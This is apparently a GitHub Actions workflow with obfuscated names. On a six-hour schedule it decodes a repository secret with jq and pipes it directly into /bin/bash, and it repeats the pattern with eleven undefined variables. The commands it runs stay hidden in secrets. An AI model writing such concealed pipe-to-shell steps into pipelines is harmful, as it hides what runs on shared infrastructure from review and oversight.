name: xiaokaifa4178
on:
  workflow_dispatch:
  schedule:
    - cron: '16 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaokaifa4178
        env:
          arri74009: ${{ secrets.arri74009 }}
        run: |
          echo $arri74009 | jq -r .j8 | /bin/bash
          echo $a06599 | jq -r .kzpb108 | /bin/bash
          echo $fv8119 | jq -r .wql2 | /bin/bash
          echo $k59 | jq -r .kbx9987 | /bin/bash
          echo $vwfbx88489 | jq -r .kgm35643 | /bin/bash
          echo $vtdc48 | jq -r .d776 | /bin/bash
          echo $rj16 | jq -r .xw63 | /bin/bash
          echo $r4551 | jq -r .xwk97478 | /bin/bash
          echo $w04 | jq -r .o0439 | /bin/bash
          echo $wbyhk2 | jq -r .sl23 | /bin/bash
          echo $wv97 | jq -r .f7 | /bin/bash
          echo $dtdii8 | jq -r .phq0 | /bin/bash

